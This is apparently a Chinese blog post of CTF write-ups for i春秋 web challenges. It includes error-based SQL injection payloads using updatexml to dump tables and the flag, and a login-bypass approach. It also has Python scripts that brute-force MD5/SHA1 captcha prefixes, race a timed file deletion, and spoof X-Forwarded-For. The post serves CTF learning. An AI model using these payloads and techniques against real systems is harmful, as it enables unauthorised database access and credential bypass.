i春秋 一些题目

最新推荐文章于 2024-07-19 15:50:29 发布
最新推荐文章于 2024-07-19 15:50:29 发布
阅读量2.1k 收藏 3
点赞数
分类专栏: ctf题目

VID

查看网页源代码发现有个文件路径 

访问的看到了有三个参数用get方式提交 

在url后提三个参数和对应的值就看到了一个1chunqiu.zip 

访问就可以下载文件

这里需要进行代码审计 

先看log.php界面

if(isset($_POST['username']) && isset($_POST['password']) && isset($_POST['number'])){
    $db = new mysql_db();
    $username = $db->safe_data($_POST['username']);
    $password = $db->my_md5($_POST['password']);
    $number = is_numeric($_POST['number']) ? $_POST['number'] : 1;
    $username = trim(str_replace($number, '', $username));
    $sql = "select * from"."`".table_name."`"."where username="."'"."$username"."'";

这里username处存在注入,他只进行了safe_data处理,我们跟进这个函数

 public function safe_data($value){
        if( MAGIC_QUOTES_GPC ){
            stripcslashes($value);
        }
        return addslashes($value);
    }

这个代码的意思是在username中找我们输入的车牌号“number”,如果找到就替换成空,

$username = trim(str_replace($number, '', $username));

根据文件路径访问到登陆界面 

提交的时候注意number必须是0,然后对username进行注入 

  1. number=0&username=%00' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#&password=123&submit=Submit+Query //爆表
  2. number=0&username=%00' and updatexml(1,concat(1,substr((select * from flag),1,15)),1)#&password=123&submit=Submit+Query //爆flag

GetFlag

看到一串代码substr(md5(captcha), 0, 6)=10c6ca 截取验证码MD5加密后的前6位,可以写脚本爆破。但是刚开始笔者陷入了误区,就是不知道验证码有几位,由哪些字符组成的。但是后来一想,这里应该是服务端接受到我们传过去的验证码,然后进行MD5加密再进行比较,所以验证码长度就不是那么重要了,但是试了下三位数的验证码能匹配成功的几率很低,所以写了一个四位验证码的脚本,爆破出来的验证码,随便选一个就可以了。 
下面是python脚本代码和笔者的测试结果

import string,hashlib
a=string.digits+string.lowercase+string.uppercase
for i in a:
    for j in a:
        for k in a:
            for m in a:
                s=hashlib.md5(i+j+k+m).hexdigest()[0:6]
                if s=="9bf514":
                        print i+j+k+m
                        break

验证码是爆破出来了,但是用户名和密码呢,尝试了sql注入没有什么结果,但是尝试万能密码登陆,果然进去了 

进去之后发现有几个文件可以下载 

将a.php下载下来发现内容提示flag is in the web root dir,这里能下载文件就可以看到文件的绝对路径,就可以访问了 

这里还需要考虑一步,是windows的服务器还是linux的服务器呢,随便访问一个链接就可以发现是Ubuntu,或者用试下路径大小写,敏感的话就是linux了 

那么根据下载链接的参数去访问绝对路径,也可以下载flag.php 

flag.php的代码如下,意思是用POST提交flag参数,当flag=flag时,会输出一个文件的内容

<?php
$f = $_POST['flag'];
$f = str_replace(array('`', '$', '*', '#', ':', '\\', '"', "'", '(', ')', '.', '>'), '', $f);
if((strlen($f) > 13) || (false !== stripos($f, 'return')))
{
        die('wowwwwwwwwwwwwwwwwwwwwwwwww');
}
try
{
         eval("\$spaceone = $f");
}
catch (Exception $e)
{
        return false;
}
if ($spaceone === 'flag'){
    echo file_get_contents("helloctf.php");
}

?>

因为flag.php在根目录,那么直接访问,然后提交POST参数,没有什么反应 

那就用burp试一下 

天下武功唯快不破

访问网站之下就有这些代码,意思是去访问这个flag.php,内容会传到生成的文件名中,文件名的路径需要拼接url+u/+md5(随机数)+txt,而且这个文件名生成10s后会删除 

写一个脚本,请求链接的时候拼接这个文件名,这里就有一点运气成分在了,可能会跑不出来,但是多试几次就可以了 
下面是python脚本代码和笔者的测试结果

# -*- coding: utf-8 -*-
import requests
import re
import md5


for i in range(0,1001):
    m1 = md5.new()
    m1.update(str(i).encode(encoding='utf-8'))
    url='http://106.75.26.211:3333/u/'+m1.hexdigest()+'.txt'
    r = requests.get(url)
    if(r.status_code!=404):
        print i
        print url
        print r.status_code #输出状态码
        print r.text #文本形式输出网页内容
        break
    '''
    else:
        print i
        print "404" #动态观察脚本运行情况
    '''

 

 

pyscript

这里可以提交,但是尝试了几下发现没有什么反应 

用burp抓包,这里有两个地方,go一次这两个地方的内容都会变,sha1(3个数字 
+每次提交都会变的明文)=每次提交都会变的Ciphertext 

写一个自动发包脚本在数据包中自动去获取明文和密文进行加密匹配,虽然只有10s,3个数字去匹配的时间还是够的 
下面是python脚本代码和笔者的测试结果

# -*- coding: utf-8 -*-
import urllib,urllib2,json
import hashlib

import re
import requests

url = 'http://106.75.108.111:1111'

def sha_1(data):
    sha_1 = hashlib.sha1()
    sha_1.update(data)
    sha = sha_1.hexdigest()
    return sha

def key(key1,key2):
    c='0123456789'
    str1 = key1
    cipher = key2
    for i in c:
        for j in c:
            for k in c:
                if sha_1(i+j+k+str1) == cipher:
                    # print (i+j+k)
                    return i+j+k
def get_info():
    r = requests.post("http://106.75.108.111:1111")
    key2 = r.headers['Ciphertext']
    cookies = r.cookies#获取cookie
    html = r.text#获取网页内容
    res = r'\+(.*?)\)'
    key1 = re.findall(res,html)[0]
    print key1
    return key1,key2,cookies

def postx(number,cookies):
    cookies = cookies#传递cookie
    values={'pass':number}
    response = requests.post("http://106.75.108.111:1111",cookies=cookies,data=values)#post请求提交
    return response.text

def sum(text):
    res = r'<!--.*?([\d\+\-\*]+).*?-->'#正则
    key3 = re.findall(res,text)[0]
    result = eval(key3)#eval将字符串str当成有效的表达式来求值并返回计算结果
    return result


if __name__ == '__main__':
    (key1,key2,cookies)=get_info()#获取标识
    number = key(key1,key2)#获取爆破出来的三个数字
    result1 = postx(number,cookies)#获取post请求内容
    result2 = sum(result1)
    print result2#输出flag
    print postx(result2,cookies)

 

 

fuzzing

抓包重放之后看到有一个大内网的提示,就需要修改X-Forwarded-For,ip为10.0.0.1段的去访问 

修改之后访问到了需要一个key 

那就POST传一个key试试看,每次放包的时候都要注意X-Forwarded-For要修改为10.0.0.1,这里提示key不正确,正确的key是ichunqiu+(5个数字和字母)加密后为5a2a7d385fdaad3fabbe7b11c28bd48e 

写一个python脚本爆破key

import hashlib
def md5(data):
    m = hashlib.md5()
    m.update(data)
    a = m.hexdigest()
    return a

a = 'ichunqiu'
b = 'abcdefghijklmnopqrstuvwxyz1234567890'
for i in b:
    for j in b:
        for k in b:
            for l in b:
                for m in b:
                    if md5(a+i+j+k+l+m)=='5a2a7d385fdaad3fabbe7b11c28bd48e':
                        print a+i+j+k+l+m

 

爆破出来key为ichunqiu618ok,再次提交就看到提示访问这个x0.txt 

 

flag是需要通过这个php脚本来解密的 

将php代码放到本地环境中,传入两个参数,就可以得到flag了 

 

 

 

白山茶i
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋杯等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
百度杯”CTF比赛 九月场,web题,题名:123,题名内容:12341234,然后就解开了
qq_43814486的博客
11-10 1158
打开后看到: 查看网页源代码: 根据提示去找user.php文件,首先我是直接访问: 然后啥也没有,尝试下载user.php文件: 下载成功,打开: 再根据原来的提示,密码是用户名加生日,上bp爆破一下 ...
i春秋CTF训练 Web 123 常见的Web源码泄露漏洞 Burpsuite Intruder模块简单应用
椰奶冻不安全的博客
07-05 997
Web 123 常见的Web源码泄露漏洞 Burpsuite Intruder模块介绍 题目内容:12341234,然后就解开了 本题来自擂主C26 题目链接请在i春秋申请 login.php 源码里发现提示,用户名+出生年份就是密码,用zhangwei和zhangwei1999试了一下,没错当然登陆失败,只能再想办法了 常见的Web源码泄露漏洞 git源码泄露 Git是一个开源的分布式版本控制系统,每次执行初始化目录的时候会在当前目录下自动创建一个.git目录,用于记录代码的变更记录等 s
目前国内氛围比较好的黑客论坛社区有哪些?
最新发布
xiangxue666的博客
07-19 643
目前国内氛围比较好的黑客论坛社区有哪些?
i春秋题库之真的很简单
qq_38060946的博客
08-19 1598
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
i春秋 WEB code
A_dmin的博客
06-10 1430
i春秋 WEB code 一天一道CTF题目,能多不能少 打开网页入目的是一张图,查看网页源代码,发现图片是base64的加密,可能存在文件读取,尝试读取index.php的文件,得到源码: <?php /** * Created by PhpStorm. * Date: 2015/11/16 * Time: 1:31 */ header('content-type:text/htm...
I春秋CTF训练营web题解(一)
Super_Yiang的博客
09-04 6201
I春秋CTF训练营web题解(一) (1)include ==hint:没错!就是文件包含漏洞.== 点开链接,发现 通过源码可知可以提交一个path的变量,通过ctrl+f搜索allow_url_include,发现是打开状态: 所以打开火狐浏览器,用hackbar工具输入: 发现存在疑似含有flag的文件 接着使用php://filter协议查看曝露出来的文件...
RSA2此资源为i春秋上的一道RSA的题目,里面包含题目的附件以及解题用到的工具。
09-04
本资源针对的是i春秋平台上的一个RSA题目,旨在帮助学习者加深对RSA算法的理解并提供解题所需的工具。 RSA算法的核心原理是基于两个大素数的乘积难以分解的数学难题,即大整数因子分解问题。算法主要包括以下步骤:...
2020年高考语文作文题目素材全国I卷含解析
09-09
今天我们聚集在这里,共同探讨春秋时期的那段历史,以及它带给我们的启示。今天我要分享的,是对鲍叔的深深敬意。鲍叔的知人之能,他的无私与大度,是我们当代青年应当学习的宝贵品质。 在春秋时期那个纷争不断的...
福建省2020年(春秋版)九年级下学期开学化学试卷(I)卷.pdf
10-14
【标题】: "福建省2020年(春秋版)九年级下学期开学化学试卷(I)卷.pdf" 涉及的知识点 本份试卷主要针对九年级下学期的化学学习进行评估,涵盖了一系列关键的初中化学概念和知识点。以下是其中可能包含的主要内容: ...
河北省衡水市2020年(春秋版)一年级上学期语文期中考试试题(I)卷.pdf
10-14
标题和描述中提到的是“河北省衡水市2020年(春秋版)一年级上学期语文期中考试试题(I)卷.pdf”,这表明这是一个针对一年级学生的语文期中考试试卷,出自河北省衡水市,适用于2020年的春秋版教材。这份试卷可能包含了...
i春秋 web code
qq_44657899的博客
02-20 1611
百度杯-九月场-code 打开是一张图片,参数jpg可以读取文件,将参数改为index.php成功读取到base64加密后的源码: <?php /** * Created by PhpStorm. * Date: 2015/11/16 * Time: 1:31 */ header('content-type:text/html;charset=utf-8'); if(! isset(...
i春秋 第二届春秋欢乐赛 Hello World
feng的博客
10-03 845
前言 有一说一,这个题目真的阴间,心态快被搞炸了。 WP 进入环境之后抓包,看源码,看是否有.bak文件都不行,用dirsearch扫一下,发现存在git泄露。然后使用githack,发现了三个文件: 发现flag.php里面是一串关于加密的东西,我以为flag需要我来进行解密,然后。。。。我人就没了。。。 这题的githack有坑,本题的考点原意是.git/logs/HEAD文件的利用,而githack并没有对其中的hash提取,因此遗漏了部分的object。简单的来说就是有重要文件githack没有提
ctf题库--天下武功唯快不破
miko2018的博客
08-21 4310
&lt;题目&gt; 看看响应头 格式:CTF{ } 解题链接: http://ctf5.shiyanbar.com/web/10/10.php &lt;解答&gt; 解题过程式解答: 1.打开拿到的网站链接,出现以下提示信息。 2.查看网页源代码,发现以下注释内容:&lt;!-- please post what you find with parameter:key --&gt; 3.根据题...
实验吧 ctf题目 天下武功唯快不破
qq_30435981的博客
08-05 1588
  首先打开题目链接是这个页面,根据页面提示,我在想着可能跟提交刷新速度啥的有关系,先看一下源码。 根据注释里面的提示,这跟提交数据速度有关系,先抓包一下。 发现在响应头里面的flag信息,是个base64加密的。解密发现是:P0ST_THIS_T0_CH4NGE_FL4G:bO4K0gONI 后面这步参考了一些大佬的wp,这是让我们将flag信息进行base64解密,然后尽可...
[CTF]天下武功唯快不破
胖胖的ALEX
06-26 596
类型:web 网址:http://www.shiyanbar.com/ctf/1854 攻击:无 一句话总结: response取得FLAG值,base64解密获得post请求的key值并post提交,获得flag。重点是必须使用脚本或者burp爆破插件,否则太慢 Writeup: python脚本 import requests import base64 url = 'http://ctf5...
WP 4 i春秋_2017年春秋欢乐赛
segOt
04-20 4518
时间 象棋 时间 多线程、爆破 这道题目给出如下源码<?php header("content-type:text/html;charset=utf-8"); '天下武功唯快不破'; setcookie('token','hello'); show_source(__FILE__); if ($_COOKIE['token']=='hello'){ $txt = file_get_cont
天下武功唯快不破
Gunther的博客
08-18 4845
http://www.shiyanbar.com/ctf/1854 天下武功唯快不破 看看响应头 格式:CTF{ } 解题链接: http://ctf5.shiyanbar.com/web/10/10.php 解: 题目提示:看看响应头 1.在软件开发中,我们有时会需要查看某网页请求的头部数据。尤其是POST方法的数据。使用POST方式怎么看报文: http://jin
i春秋网络内生试验场CTF答题夺旗赛(第三季)WP
李熠专用博客_白帽子一枚,人称低危终结者
11-30 2485
0x01 weak 依次点击管理平台->跳转到测试页,可看到测试页代码,可知是一道MD5弱类型的题,只需要找到MD5加密出来为0e,并且用户名和密码不相等且不为数字的即可,笔者已找到两个符合条件的明文,分别是:QNKCDZO和aabg7XSs,回到管理页,用户名和密码分别输入可得flag。 0x02 Electrical System 逆向分析程序可知,这是一个栈溢出的题,编写exp如下:...
i春秋CVE-2022-32991
08-12
- *1* *2* *3* [【春秋云境】CVE-2022-32991靶场wp](https://blog.csdn.net/MONSTERinCAT/article/details/127261129)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值